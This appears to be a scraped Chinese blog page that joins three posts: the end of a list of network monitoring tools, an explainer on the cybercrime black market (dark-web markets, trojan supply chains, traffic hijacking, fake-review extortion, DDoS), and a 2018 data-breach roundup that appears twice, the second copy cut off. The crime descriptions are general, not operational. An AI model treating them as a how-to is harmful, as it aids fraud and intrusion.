34)观察

Observium是一种自动发现网络监控工具。它支持各种设备类型,平台和操作系统。该工具为您的网络运行状况和状态提供直观,直观的界面。

特征:

  • 流量计费功能可帮助您跟踪和计算客户带宽使用情况
  • 支持多个第三方应用程序
  • 阈值警报系统可帮助您配置各种实体的阈值和故障状态。
  • 通过发现许多潜在问题来提高网络的可靠性

下载链接: http //www.observium.org/

35)Monit

Monit是专为Unix系统设计的开源网络监控和管理工具。该监控工具执行自动维护和修复。它还可以在错误情况下执行有意义的操作。

特征:

  • Monit可用于监视在localhost上运行的可疑进程或类似程序
  • 它可用于监视localhost上的文件,目录和文件系统。
  • 支持UDP,TCP,UDP和套接字。
  • 允许您监视本地主机上的常规系统资源,如总体CPU使用率,内存和平均负载

下载链接: https //mmonit.com/monit/

36)Dynatrace(Compuware APM)

Dynatrace系统监控工具允许您在极短的时间内自动发现和建立整个IT生态系统。它允许您监视和管理应用程序性能和云基础架构。

特征:

  • 用于监控业务,运营和开发的网络解决方案
  • 提供业界领先的监控功能
  • 优化客户体验
  • 提供高性能的应用程序
  • 监控云原生应用程序

下载链接: https //www.dynatrace.com/

37)千眼

一个千眼联网监控软件可以让你在任何地方找到问题的原因。立即分享您的发现并在问题损害您的客户,服务和收入之前回应问题。

特征:

  • 可视化多层网络数据以检查各种基础架构,服务和应用程序
  • 通过互联网上的智能代理提供网络各个部分的独特见解
  • 帮助您在算法的帮助下找到原因
  • 将数据和见解直接集成到现有工作流程和系统中

下载链接: https //www.thousandeyes.com/

38)SevOne

SevOne提供整个企业网络的完整可见性,可以应对应用程序性能管理的挑战。它管理从内部部署应用程序到在云中运行的应用程序的所有内容。

特征:

  • 提供即时图表和临时报告
  • 您可以从单个视图查看多个图形和表格报告
  • 自动将报告分发给利益相关者。
  • 查看关键网络事件和状态图

下载链接: https //www.sevone.com/

39)AppNeta

AppNeta工具为任何云,远程位置和所有类型的企业提供基于SaaS的网络和最终用户体验性能监控。

特征:

  • 自动,连续识别正在使用的所有应用程序
  • 识别所有正在使用的应用
  • 帮助您减少停机时间和成本

下载链接: https //www.appneta.com/

40)真人

LiveAction是值得信赖的网络解决方案提供商工具 它可以让您快速了解数字企业的性能保证。

特征:

  • 对整个网络中的应用程序性能进行有意义的更改
  • 帮助您为用户提供更好的用户体验
  • 规划,管理和排除网络性能故障。
  • 关键应用的质量和服务管理
  • 深入了解应用程序和最终用户体验

下载链接: https //www.liveaction.com/

41)NetCrunch

NetCrunch Network借助交换机流量监控和流量分析器等功能监控您的网络基础架构和流量。

特征:

  • 监视各种SNMP设备的包
  • 基于策略的配置
  • SNMP陷阱和通知
  • 完整的SNMPv3支持
  • 监控自定义网络服务

下载链接:https://www.adremsoft.com/

42)Vigilo NMS

Vigilo是一种网络监控解决方案,提供性能监控所需的所有类型的服务。像状态监控,映射,关联,计量,报告。

特征:

  • 为服务器集合提供地理分布的高级功能
  • 您可以在系统架构中部署重要模块。
  • 支持监视SNMP中本机交互的设备,系统和应用程序
  • 旨在处理数千台设备
  • 为远程监控机制提供支持

下载链接: https //www.vigilo-nms.com/en/home-page/

43)Shinken

Shinken是一个监控框架。它提供完全虚拟化集成和无限可扩展性以及类似RAID的可用性。

特征:

  • 快速监控您的服务器和应用程序
  • 允许重用Nagios配置
  • 从Puppet和Mysql等新来源加载数据,并添加新的导出方法,如Graphite

下载链接: http //www.shinken-monitoring.org/

今天就分享到这里,还是老规矩希望大家多多关注哦,最后希望大家早点休息,做个好梦,晚安!

2018年的43个最佳网络监控工具

做巨头生意也囤洗发水,黑产江湖你不知道的那些事

在世界经济论坛发布的《The Global Risks Report 2018》中,网络安全已经成为除自然灾害以外,最大的风险所在。据统计,2017 年黑产从业人员超 150 万,市场规模更是达到了千亿级别……

做巨头生意也囤洗发水,黑产江湖你不知道的那些事

2018年全球风险报告

网络安全已经成为除自然灾害以外,最大的风险所在。

一、全球互联网的至暗时刻

早在2016年网络安全技术高峰论坛上,全球著名信息安全专家,卡巴斯基创始者尤金•卡巴斯基曾表示,目前网络安全正处于一个黑暗时代……

做巨头生意也囤洗发水,黑产江湖你不知道的那些事

卡巴斯基公司CEO 尤金•卡巴斯基先生发表讲话

1. 网络威胁呈现几何式增长

从1986年出现的第一次网络威胁,20年间,数据显示有100万恶意软件的攻击。20年后,在2006年的短短一周内,恶意攻击数据已达到220万。而如今,仅是发现的漏洞就超过40亿,网络威胁已超过了前两年的总和……

2. 全球资产损失达千亿美元

尤金·卡巴斯基表示网络犯罪每年造成的全球损失在4千亿到5千亿美元之间,而随着全球企业和政府对数字系统的依赖日益增加,“网络攻击”已经取代“社会两极分化”成为影响未来十年经济稳定最大的风险。

全球最大的保险公司Lloyd’s of London在2017年发布报告表示,大型全球性网络攻击可能会使得全球经济平均损失530亿美元,而这一数据甚至已超过 2012年导致美国113人死亡,联合国总部受损的飓风“桑迪”(飓风“桑迪”所带来的经济损失,总计300亿至500亿美元之间)。Lloyd’sof London向全球发出警告,网络攻击带来的经济损失堪比飓风或其它自然灾难!

3. 网络威胁更加复杂

随着物联网的发展,以及人工智能技术的突破,让网络攻击形式与手段变得愈发多样。曾以为办公室系统或手机是最容易被攻击的,事实上很多连接到物联网上的设备都可能受到攻击。包括:智能家居、智能汽车、智能火车、地铁甚至一些电厂电站等,现在它们都变成最容易被攻击的目标。另外一方面,人工智能技术应用逐渐渗透到各个领域,黑产组织已实现高度还原自然人行为的技术突破,骗过传统风控体系,给政府以及企业带来致命打击。

然而讽刺的是,这位全球信息安全的领军人物,至今不用智能手机…..

做巨头生意也囤洗发水,黑产江湖你不知道的那些事

前卡巴斯基代言人 周杰伦

二、“网络黑产”,另一个平行的互联网世界

没错,不经意间,这群人的确将地下产业链玩成了“产业”,而且市场规模更是达到了千亿级别……

做巨头生意也囤洗发水,黑产江湖你不知道的那些事

源自《2017年度网络黑产威胁源研究报告》

黑产是黑色产业的简称,广义上包括贩毒、高利贷、私彩、网络诈骗等行业,狭义上是指利用互联网技术不正当获取利益的一个行业,现在提到黑产一般指狭义上的黑产。黑产一般都有交易链,通常在搜索引擎搜索不到、一般人也难以进入的暗网进行大规模交易,也会在私人网站或者交易论坛进行交易。

而作为黑产的重要地下交易变现的平台,其实暗网是深网(Deep Web)的一个子集,“暗网”一词最初由Dr.Jill Ellsworth于1994年提出。通常指只能用特殊软件、特殊授权、或对电脑做特殊设置才能连上的网络,其服务器地址和数据传输也通常是匿名、匿踪的。

根据美国Market Watch调查数据显示,目前全球范围内,存在三大黑网交易市场,分别为:Dream、Wall Street与PointMarketplace。

1. Dream市场

作为深网最古老的市场,Dream从2013年就屹立不倒,而这对于黑网来说,可以说是历史悠久了。诈骗和萧条通常会在一年内终结一家暗网市场,而Dream仍然存在,这证明其稳健强大。它接受比特币核心钱包,比特币现金和门罗币,拥有50,000个数字商品和63,000个药品目录。在“其他业务”类别中又包括:复古Air Jordan运动鞋、500欧元纸币、信用卡号码和变态色情订阅。还有一个“服务”部分,在这个部分你可以购买假身份证或针对Youtube上您特别讨厌的视频订购差评服务。只需0.8 BTC,你可以完全消失,然后以全新的身份出现。

2. Wall Street

充满恶意和双重交易的Wall Street是一个罪恶与阴谋汇集地。该网站声称拥有将近3000个供应商和400,000个客户,并接受BTC和XMR。相对于Dream而言,WallStreet的产品较少,但拥有更多的类别包括“安全与托管”,就在“欺诈”一栏边上。并非所有可以在深网上购买的东西都是非法的,比如,曾有媒体表示,在上面看到过有人卖代餐食品。

3. Point MarketplacePoint

前身为Tochka,是自2015年以来一直运行的俄罗斯DNM。它具有许多创新特性,包括秘密交收情报点,使供应商可以将产品留在某个位置,买家随后收集。该网站的正常运行时间比Wall Street和Dream的要少(三者分别为90%和97%和98%),并且在过去几天内一直处于离线状态。不过,Point的客户服务得到高度评价,并且该网站会储存你期望在深网上找到的所有常用物品。

而我们接触到更多的还是在暗网上售卖的各类互联网巨头的敏感信息,其中就包括Gmail、Facebook、Uber以及Grubhub等用户信息,售价分别为每份1美元、5.2美元、7美元、9美元……

而在上面交易的各方,因为暗网的特殊性,并不为人所知。这里面就包括巨头Facebook……

2015年从雅虎跳槽到Facebook的阿列克斯·斯塔莫斯(Alex Stamos)表示,曾经为核查用户有没有选择弱口令,公司从黑市购入黑客售卖的口令,与网站所用的加密口令进行交叉参照。

做巨头生意也囤洗发水,黑产江湖你不知道的那些事

Facebook首席安全官AlexStamos

遗憾的是,3年后东窗事发,Facebook曝出信息泄露丑闻。多家英美媒体披露一家名为“剑桥分析公司”的数据分析企业,在未经授权的情况下,获取了美国社交媒体脸书多达5000万用户的个人信息,用于软件设计以预测并影响选民投票。而在这次数据泄露事件引发Facebook内部动荡中,首席安全官AlexStamos也宣布将于8月离职。

三、“网络黑产”,一个规模达千亿级的市场

作为全球互联网黑色产业的风向标,网络“黑产”在中国的发展史极具代表性:

  • 2003年前后,互联网刚刚开始在大众中普及。QQ号被盗,几乎就是当时出现最多的网络安全事件。不过,这样的互联网安全事件当时大多以个体行为进行,其目的大多是窥探隐私等个人目的,或为了获取“靓号”给自己用,并未造成太大的社会危害;
  • 2005年到2006年前后,一批以盈利为目的、小作坊式的批量盗号团伙开始出现,盗号开始成为违法分子获取非法收入的一个重要途径;
  • 2016年之后,互联网金融、区块链等热门行业,均成为“黑产”从业者瞄准的对象。从虚拟账户、虚拟货币以及虚拟财产,转向人们的银行卡资产升级

而这个规模达千亿级的市场,更是表现出惊人的细分,其中主流的包括:薅羊毛、电信金融诈骗、养号刷单、木马病毒、网络私彩、知识盗版、搜索引擎“优化”、大流量DDoS攻击八大类。在这八大类下,又延伸细分出更多领域。

做巨头生意也囤洗发水,黑产江湖你不知道的那些事

黑产图谱

1. 木马病毒产业链:

这一产业链历史悠久,也是伴随着电脑病毒的社会化而逐渐成熟。

从最早的兴趣无意制造病毒开始,变成了:设计制造木马病毒、交易买入流量推广、传播扩散木马病毒、对中毒用户进行信息窃取、对信息及虚拟财产套现等多个链条环节,从而形成一种暴利行业。它之所以可以赢利的模式是:

  • 最早的制造者开发并制作具有盗号、远程控制、自动传播等功能的木马病毒,并根据时事热点设计这类木马的传播方式、触发环境,并及时针对杀毒软件开发出免杀功能,及时更新并维护;
  • 提供流量交易环节的人比较复杂,有网络行业的内鬼、有无良站长,也有黑客,他们会通过各种手段实施“挂马”为木马病毒提供传播与存在的平台及流量;
  • “包马人”是这一产业链的核心,他们对上购买木马病毒,对下采购网络流量,实施网络“挂马”之后,开始从中窃取收获各类有用信息并进行整理,主要是各种实名信息、隐私信息以及各类网络帐号以及帐号内的虚拟财产;
  • 最后就是变现环节,实际上许多正规企业以及互联网品牌都有可能涉及这一块。他们会以“大数据分析”为由,采购各类来自于这里的个人隐私信息。也有更多的会是一些诈骗团队甚至犯罪团伙,采购了此类信息,然后进行各种诈骗活动或者是欺骗式营销;

变种与扩展:

这一黑色产业链中,也有从具体的木马病毒之外,通过人工网上钓鱼或者是设计的程序进行撞库尝试等手法,同样进行各类盗取帐号的行为,然后再进行整理、“洗号”等等手法,最后再出售变现;

最近由于苹果设备的流行,更有研究利用Apple ID的管理规则为被盗iPhone进行解锁服务的等等,都大致可以属于这一大类产业链中。

2. 养号刷单产业链:

这一产业链包括:养号、刷单与利益变现这三个主要环节。

养号这一块有两个来源,一是通过网络招募人来参加,只是这类号的平台非常分散,质量参差不齐,而且也难以统一调度,越来越不被重视。

而眼下真正能够形成市场的是通过定制开发的程序甚至是专门设备,可以批量拥有大批的手机号、指定系统的帐号甚至是能拥有一定权限与层别的帐号。

然后以这些帐号按照指定规则去生成所需要的相关数据与指标,最后拿这一结果来兑换最终的收益;

虽说是流程相似,但是在具体的实施操作中,会根据刷单的目的分为数据刷量服务、奖励补贴盈利以及敲诈勒索等多种方向:

  • 数据刷量服务:多服务于淘宝卖家、APP或自媒体号运营者以及眼下到处热门的投票评选活动的参加对象。他们或者想提升自已的排名、名次、形象,或者需要一定的对外展示数据。根据不同平台对于反刷量的技术限制,这类服务都会有对应的解决方案,其收费标准也不一样;
  • 奖励补贴盈利:做这一类工作的也称羊毛党。主要是针对电商平台、商家促销、媒体自身有奖推广等活动,研究其规则漏洞或规律,以大量的养号、密集的操作以及快速的技术应对,从中赚取大量的奖品、兑换券、优惠券甚至是直接的返利金额,再将不同收益通过相关渠道进行变现;
  • 敲诈勒索:最早的是电商平台上的职业差评师。它们会把手中的号养成非常具有说服力的用户帐号,然后再研究各个大型平台的管理规则,有针对性地利用这些平台的惩罚机制,大规模发起各种差评、投诉以及恶意评价行为,借此逼迫被差评对象支付相应的赔偿或费用,并从中盈利;

变种与扩展:

正规的刷单平台,当然只是赚取中间的差价,或者被他们包装成为管理费。但是在现实中,更会有许多平台最终会直接吞掉刷单带来的所有收益,甚至根本就是假装成刷单平台,利用大家对这一黑色产业链的基本认知,骗人加入,通过各种方法收费或拿到收入后直接跑路,实质沦为直接的诈骗行为;

此外,网络上也经常介绍的游戏装备低价代购、低价代充值等等黑产业链,利用的是苹果公司或其它平台公司的退款漏洞,这是属于这一条里的变种;还有一些代收验证码、代注册帐号等,也是这一类里羊毛党里的变种;

3. 流量劫持产业链:

这是最具互联网特质的黑色产业链。

因为网络企业大多都离不开流量,无论哪个行业、哪个品牌,都需要各种访问量、展示量。依赖于广告营收的行业更是离不到高流量的支撑。

那么,除了常规的广告推广与各种引导之外。通过一些不光彩的技术手段,对正常网民上网的访问流量进行劫持、误导甚至是替换,就有了非常大的应用市场;

  • 有直接在不同电信服务商内部的员工与技术人员,私自进行网络协议层面的恶意解析,在确保劫持概率在正常人不易发觉的前提下,将原本是访问A的流量故意解析劫持到B处去,再向B收取高额的流量推广费用;
  • 有黑客或木马病毒的制造者,通过攻击用户家里的路由器或者某些小区、单位里的相关网络设备,从而掌握一大批能够被自己所控制的“肉机”设备,然后针对不同用户的需求,直接将这里所能拥有的一定流量进行劫持后出卖;
  • 更有一些小品牌的路由器厂家,也有各类杂牌电脑、山寨手机,都会在它们的硬件设备内部,留有后门;又或者会在产品内加入一些软件层面的误导与诱导,从而可以根据市场上的业务需求,可以随时开关、启动流量的劫持功能;

在这一产业中,也会有一些灰色部分。

比如说某些打着安全监控名义的软件,某些打着网址导航旗号的产品,也有直接做浏览器、搜索引擎的软件方。

会以各种擦边球,诱导用户在指定情况下进入它们的页面。这本质仍然是一种劫持。然后再把劫持下来的流量变卖给出价的一方;

4. 网络私彩产业链:

由于国内至今为止都未对网络彩票开放牌照申请,因此,凡是在网络上开展彩票业务的,均属于黑色产业。

简单来说,网络私彩其开彩的数据,无论是声称来源于国内的福彩体彩,还是说同步于国外的知名彩票网站,这些都不具备任何技术监控与公平保证。当然更多的就是开设私彩方自己所提供的盘口;

私彩最大的问题就在于,没有任何授权许可部门以及监管力量。

比如说,某些自称同步于国内体彩与福彩数据的站点。对方根本就没有真实出票,这被叫做“吃票”。

而万一有人中了不大的奖金,私彩站也就自己出了,这与购买费用来比,是小巫见大巫。而万一有人中了大奖金,私彩站也就直接卷钱跑路,大不了改头换脸再来;

稍微正规一点的私彩站,实际采取的是非法赌场的思路,它们看起来似乎更讲究信用,实际上却是“放长钱钓大鱼”,采取的是培养重度用户的策略,最早是分析并发现有价值的用户,然后通过小奖诱惑,让他们步步入局,但是在整个过程之中,所有的中奖率都是被它们完全控制的;

5. 知识盗版产业链:

这一条黑色产业链的历史更为悠久,衍生发展的也非常之多。

主要包括有盗版影视网站、盗版书籍阅读、盗版论文检索服务、还有大家更熟悉的游戏私服(盗版游戏)。其主要参与环节包括源数据窃取(非法翻录、盗窃、复制、破解)、非法站点建立及维护、收费或流量变现。

这类站点从最早的互联网上遍地都有,到目前的躲躲藏藏,但其背后的利润率,却随着知识产权的水涨船高而变得越来越丰厚;

6. 电信金融诈骗产业链

这一类大家更熟悉了,之前主要基于电话手机进行,之后随着QQ、微信的普及,开始在互联网上漫延。

主要由群发信息撒网、客服接听收线、钓鱼诱导或直接诈骗、钱款到帐后快速转移等多个环节密切配合。

这类产业链的手法不断更新换代,其核心就是利用人的贪念、色欲、胆小及人情弱点。有冒充公检法警、有冒充家人亲友、有冒充领导客户、有冒充名人大腕,虽然花样百出,但均属同一类型;

7. 黑帽SEO

黑帽seo,手法不符合主流搜索引擎发行方针规定。黑帽SEO获利主要的特点就是短平快,为了短期内的利益而采用的作弊方法。

目前,白帽seo与黑帽seo没有一个精准的定义。笼统来说,所有使用作弊手段或一些可疑手段(如博客作弊、网页劫持、挂黑链、垃圾链接,隐藏网页、蜘蛛池页面引流等)的都可称为黑帽SEO。

8. 大流量DDoS攻击

DDOS(Distributed Denial of Service),中文全称分布式拒绝服务,就是借助多台计算机作为平台来攻击服务器的一种方式的统称,DDOS攻击还包括 CC攻击、NTP攻击、SYN攻击、DNS攻击等。遭受DDOS攻击的网站会出现:网站无法访问、访问提示“server unavailable”、服务器CPU使用率100%、内存高占用率。

通俗一点,类似于电影里面经常出现的桥段,黑势力为了获取保护费,组织大量社会闲散人员恶意占座,导致个体商户无法正常经营。而这一手段,对受攻击企业来说,其危害可能是毁灭性的。也是目前最强大、最难防御的攻击之一。

四、专家意见:技术创新、人才培养和政府合作

针对上面一系列问题,目前安全圈还未有一个趋近完美的解决方案。Magiccc这里就搬运尤金·卡巴斯基的意见,因为觉得这个思路是当前看到最为靠谱的论断:

1. 技术创新

新技术在信息安全领域的应用,这个是源动力。一些新的技术、新的创新,会逐渐应用在企业信息安全平台建设中。但是这需要时间,要很久才能够把信息安全技术整合在关键的技术上,可能未来的五六年后才会发酵。到那时,网络安全的黑暗时代,就像曲线一样会滑到谷底,必将会被终结(Magiccc始终觉得这是大佬们安慰客户爸爸的说法)

2. 人才创新

如果说技术创新是信息安全领域突破的源动力,那么人才创新则是这一切的源动力。世界各国要花很长的时间才能让IT人员变成信息安全类的专家。大佬说的很对,目前信息安全这块的人才,可以说已关乎到一个企业未来能走多远。

3. 政府合作

黑产背后都是一群人,针对这群人,仅凭企业、服务商以及政府中的一个,可以说很难应对。但是,如果三方合作,将获得意想不到的效果。目前,互联网巨头们已尝到甜头,加紧了与政府的合作与联系。

最后,还是想说,信息安全的攻与防将是一场持久战,我们均在其中,唯有重视安全建设,不断技术创新才有可能在黑产组织攻击之前做好防御,抵御潜在威胁。

回顾|2018上半年十大数据泄露事件

2018年才只过去了一半,但是已经被报道的一些数据泄露的规模是令人震惊的。你认为Facebook是最大的一个吗?请再猜一次。

回顾|2018上半年十大数据泄露事件

对于信息安全来说,六个月可以说是一段很长的时间,因此在2018年上半年出现了大量的数据泄露事件,也就不足为奇了。以下是我们汇总的2018年至今被披露的十起规模较大的数据泄露事件,其中包括事件的故事本身以及遭泄露数据的数量。

一、2018上半年十大数据泄露事件

10. Saks和 Lord & Taylor

回顾|2018上半年十大数据泄露事件

  • 泄露数据500万条
  • 披露日期:2018年4月3日

3月底,安全公司Gemini Advisory偶然发现了一个来自JokerStash黑客集团发布的公告,宣称已出售有关500万张被盗信用卡和借记卡的数据。在各种金融机构的协助下,Gemini Advisory公司对这些交易进行了追踪,并最终将这些交易归因于Saks Fifth Avenue和Lord&Taylor的系统入侵。两家百货公司的共同所有者Hudson Bay在了解到这一事件之后,采取了补救措施。但对于Bernadette Beekman来说,这还远远不够,他于2018年4月代表在2017年3月至2018年3月的黑客入侵期间在Lord&Taylor商店使用支付卡消费的所有客户提起了集体诉讼。在她的诉讼中,Beekman称Lord&Taylor“未能遵守安全标准,并在用于保护其客户的财务信息和其他隐私信息的安全措施上‘偷工减料’,而原本这些安全措施本可以防止或减轻安全漏洞所带来的影响。”

9. PumpUp

回顾|2018上半年十大数据泄露事件

  • 泄露数据600万条
  • 披露日期:2018年5月31日

5月31日,ZDNet报道称,安全研究员Oliver Hough联系他们说发现了一台暴露在互联网上的后端服务器,并且没有得到密码。该服务器属于健身应用程序PumpUp,它使得任何能够找到它的人都能访问大量的敏感用户数据,包括用户输入的健康信息、照片以及用户之间发送的私人消息。暴露的数据还包含Facebook访问令牌,在某些情况下还包含未加密的信用卡数据,如卡号、到期日期和信用卡验证值。

当ZDNet与PumpUp取得联系时,该公司并没有做出回应,但它确实悄悄地对服务器实施了保护措施。目前尚不清楚该资产在受到保护之前,已经暴露了多长的时间。

8. Sacramento Bee

回顾|2018上半年十大数据泄露事件

  • 泄露数据1950万条
  • 披露日期:2018年6月7日

今年2月,一名匿名攻击者截获了由Sacramento Bee拥有并运营的两个数据库。其中一个IT资产包含加利福尼亚州州务卿提供的加州选民登记数据,而另一个则存储了用户为订阅该报刊而提供的联系信息。在截获了这些资源之后,攻击者要求支付赎金以换取重新获得对数据的访问权限。Sacramento Bee最终拒绝了这一要求,并删除了数据库,以防止在将来这些数据库在被利用来进行其他更多的攻击。

根据Sacramento Bee的说法,这起黑客攻击事件共暴露了5.3万名订阅者的联系信息以及1940万加州选民的个人数据。

7. Ticketfly

回顾|2018上半年十大数据泄露事件

  • 泄露数据超过2700万条
  • 披露日期:2018年6月7日

5月31日,Ticketfly遭遇了一次攻击,导致音乐会和体育赛事票务网站遭到破坏,并离线和中断一周。据报道,此次攻击事件背后的黑客先是警告Ticketfly存在一个漏洞,并要求其支付赎金。当遭到该公司的拒绝后,黑客劫持了Ticketfly网站,替换了它的主页,用一个包含2700万个Ticketfly账户相关信息(如姓名、家庭住址、电子邮箱地址和电话号码等,涉及员工和用户)的页面。

6. Panera

回顾|2018上半年十大数据泄露事件

  • 泄露数据3700万条
  • 披露日期:2018年4月2日

4月2日,安全研究员Dylan Houlihan联系了调查信息安全记者Brian Krebs,向他讲述了他在2017年8月向Panera Bread报告的一个漏洞。该漏洞导致Panerabread.com以明文泄露客户记录,这些数据可以通过自动化工具进行抓取和索引。Houlihan试图向Panera Bread报告这个漏洞,但他告诉Krebs,他的报告被驳回了。在此后的八个月里,Houlihan每个月都会检查一次这个漏洞,直到最终向Krebs披露。随后,Krebs在他的博客上公布了这些细节。在Krebs 的报告发布后,Panera Bread暂时关闭了起网站。

尽管该公司最初试图淡化此次数据泄露事件的严重程度,并表示受到影响的客户不到1万人,但据信真实数字高达3700万。

5. Facebook

回顾|2018上半年十大数据泄露事件

  • 泄露数据至少8700万条(尽管可能还有更多)
  • 披露日期:2018年3月17日

谁能忘记2018年3月令人震撼的Facebook数据泄露丑闻?当时,有报道称,一家名为Cambridge Analytica的数据分析公司通过一个应用程序收集了5000万Facebook用户的个人信息,该应用程序详细描述了用户的个性、社交网络以及在平台上的参与度。尽管Cambridge Analytica公司声称它只拥有3000万用户的信息,但经过Facebook的确认,最初的估计实际上很低。今年 4月,该公司通知了在其平台上的8700万名用户,他们的数据已经遭到泄露。

不幸的是,随着对Facebook应用程序更深入的审查,看起来Cambridge Analytica丑闻可能只是冰山一角。6月27日,安全研究员Inti De Ceukelaire透露了另一个名为Nametests.com的应用程序,它已经暴露了超过1.2亿用户的信息。

4.  MyHeritage

回顾|2018上半年十大数据泄露事件

  • 泄露数据超过9200万条
  • 披露日期:2018年6月4日

一名安全研究员于6月4日联系了在线家谱平台MyHeritage的首席信息安全官,并透露他们在公司外的私人服务器上找到了一个标有“myheritage”的文件。在检查文件后,MyHeritage的官员确认该资产包含了在2017年10月26日之前已注册MyHeritage的所有用户的电子邮箱地址。该公司发布的一份声明称,由于MyHeritage依赖第三方服务提供商来处理会员的付款,因此它也包含了他们的哈希密码,但不包含支付信息。由于该服务将家谱和DNA数据存储在与存储电子邮箱地址的服务器不同的服务器上,因此MyHeritage表示没有理由相信这些信息已经被暴露或受到损坏。

3. Under Armour

回顾|2018上半年十大数据泄露事件

  • 泄露数据5亿条
  • 披露日期:2018年5月25日

3月25日,Under Armour获悉有人未经授权访问了MyFitnessPal平台,这是一个用于跟踪用户饮食和锻炼情况的平台。美国全国广播公司财经频道(CNBC)在当时报道说,负责此次黑客入侵的犯罪分子访问了用户的用户名、电子邮件地址和哈希密码。但没有暴露用户的付款信息,因为Under Armour对这些数据进行了分别处理。同时,它也没有损害社会安全号码或驾驶执照号码,因为服装制造商表示它并不会收集此类数据。

据信,超过1.5亿MyFitnessPal用户的信息在数据泄露中受到了损害。

2. Exactis

回顾|2018上半年十大数据泄露事件

  • 泄露数据超过4亿条
  • 披露日期:2018年6月26日

安全研究员Vinny Troia在2018年6月发现,总部位于佛罗里达州的市场营销和数据聚合公司Exactis已将一个数据库暴露在可公开访问的服务器上。该数据库包含2TB的信息,其中包括数亿美国人和企业的详细信息。在撰写本文时,Exactis尚未确认受此事件影响的确切人数,但Troia表示他能够找到近3.4亿条个人记录。他还向Wired证实,此事件暴露了消费者的电子邮箱地址、实际地址、电话号码以及一系列的其他个人信息,在某些情况下包括极其敏感的细节,如孩子的姓名和性别。

1. Aadhaar

回顾|2018上半年十大数据泄露事件

  • 泄露数据11亿条
  • 披露日期:2018年1月3日

今年1月份,论坛报业集团(Tribune News Service)的记者为WhatsApp上匿名卖家提供的一项出售登录凭证的服务支付了500卢比。通过这项服务,记者可以输入任何一个Aadhaar号码(一个12位的唯一标识符,每个印度公民会使用到它)检索印度唯一身份识别管理局(UIDAI)存储的关于被查询公民的诸多类型的信息。这些数据包括姓名、住址、照片、电话号码和电子邮箱地址。在向卖家额外支付300卢比的费用后,任何人都可以通过该软件打印某个Aadhaar号码归属者的身份证。

据信,这起数据泄露事件已经损害了在印度注册的11亿公民的个人信息。

二、其他值得注意的数据泄露事件

1. Strava

2017年11月,健身追踪应用程序Strava有意发布了一份包含1300万用户活动轨迹的“热图”。这张地图让我们了解了世界各地的人们是如何利用Strava来实现他们的健身目标的。但正如Bleeping Computer在1月底报道的那样,它也起到了意想不到的作用。联合冲突分析研究所(Institute for United Conflict analyst)的分析师Nathan Ruser于2018年1月发现,该地图显示了军事基地的位置。这是通过在已知军事设施所在的偏远地区展示人们的身体活动来发现的,其中包括美军基地以及土耳其和俄罗斯基地。

2. Health South East RHF

今年年初,挪威卫生安全部门HelseCERT检测到了异常的计算机活动。它最终将这种可疑行为追溯到了作为挪威四大区域医疗保健组织之一的Health South East RHF。根据Security Affairs的报道,HelseCERT发现这起攻击是由一群“专业的”和“高端的”攻击者发起的。

在HelseCERT披露此事件后,挪威卫生与护理部澄清说,该国采取了各种安全措施来解决这一问题。

受攻击影响的人数确切人数尚不清楚。但考虑到Health South East RHF的覆盖范围,可能有290万人(超过挪威总人口的一半)成为了事件的受害者。

3. [24]7.ai

4月4日,西尔斯控股公司(Sears Holding Corporation)和达美航空公司(Delta Airlines)都公布了属于数十万客户数据遭泄露的消息。这些数据是通过[24]7.ai的数据泄露而暴露出来的,这是一种提供在线聊天支持的第三方服务。

根据达美航空的声明,这起黑客入侵事件被认为发生在2017年9月26日至2017年10月12日期间,可能泄露了信用卡信息,但受影响的客户数量不详。该航空公司强调,没有其他信息(如护照、身份证或SkyMiles信息)受到影响。西尔斯估计,可能有少于10万名客户的信用卡信息在此次黑客入侵中被曝光。 一天后,零售商百思买(Best Buy)宣布,其一小部分客户可能也受到了此次事件的影响。

4. Orbitz

3月1日,Orbitz 发现 有人未经授权访问了它的一个遗留的旅行预订平台。这家在线旅行社认为,攻击者有能力查看某些敏感信息,包括客户姓名、出生日期、电话号码、电子邮箱地址、帐单地址、性别和支付卡信息。但没有证据表明这一事件暴露了客户的护照、旅行路线或社会安全号码。

根据彭博(Bloomberg)报道,黑客可能在2017年10月1日至2017年12月22日期间访问了88万名客户的支付卡详细信息。

三、令人不安的上半年

根据身份盗窃资源中心(ITRC)的2017年数据泄露总结报告,在2018年第一季度和第二季度遭泄露数据的数量已经超过了2017年全年遭泄露数据数量的总和。值得注意的是,本文所提供的数据泄露事件列表远远谈不上全面。在2018年上半年发生了许多其他的数据泄露事件,这意味着遭泄露数据的数量实际上要多得多。不过,也只有时间才能够证明这是否属实。

2018上半年规模最大的十起数据泄露事件

2018上半年规模最大的十起数据泄露事件

2018年才只过去了一半,但是已经被报道的一些数据泄露的规模是令人震惊的。你认为Facebook是最大的一个吗?请再猜一次。

对于信息安全来说,六个月可以说是一段很长的时间,因此在2018年上半年出现了大量的数据泄露事件,也就不足为奇了。以下是我们汇总的2018年至今被披露的十起规模较大的数据泄露事件,其中包括事件的故事本身以及遭泄露数据的数量。

10) Saks和 Lord & Taylor

2018上半年规模最大的十起数据泄露事件

  • 泄露数据500万条
  • 披露日期:2018年4月3日

3月底,安全公司Gemini Advisory偶然发现了一个来自JokerStash黑客集团发布的公告,宣称已出售有关500万张被盗信用卡和借记卡的数据。在各种金融机构的协助下,Gemini Advisory公司对这些交易进行了追踪,并最终将这些交易归因于Saks Fifth Avenue和Lord&Taylor的系统入侵。两家百货公司的共同所有者Hudson Bay在了解到这一事件之后,采取了补救措施。但对于Bernadette Beekman来说,这还远远不够,他于2018年4月代表在2017年3月至2018年3月的黑客入侵期间在Lord&Taylor商店使用支付卡消费的所有客户提起了集体诉讼。在她的诉讼中,Beekman称Lord&Taylor“未能遵守安全标准,并在用于保护其客户的财务信息和其他隐私信息的安全措施上‘偷工减料’,而原本这些安全措施本可以防止或减轻安全漏洞所带来的影响。”

9)PumpUp

2018上半年规模最大的十起数据泄露事件

  • 泄露数据600万条
  • 披露日期:2018年5月31日

5月31日,ZDNet报道称,安全研究员Oliver Hough联系他们说发现了一台暴露在互联网上的后端服务器,并且没有得到密码。该服务器属于健身应用程序PumpUp,它使得任何能够找到它的人都能访问大量的敏感用户数据,包括用户输入的健康信息、照片以及用户之间发送的私人消息。暴露的数据还包含Facebook访问令牌,在某些情况下还包含未加密的信用卡数据,如卡号、到期日期和信用卡验证值。

当ZDNet与PumpUp取得联系时,该公司并没有做出回应,但它确实悄悄地对服务器实施了保护措施。目前尚不清楚该资产在受到保护之前,已经暴露了多长的时间。

8) Sacramento Bee

2018上半年规模最大的十起数据泄露事件

  • 泄露数据1950万条
  • 披露日期:2018年6月7日

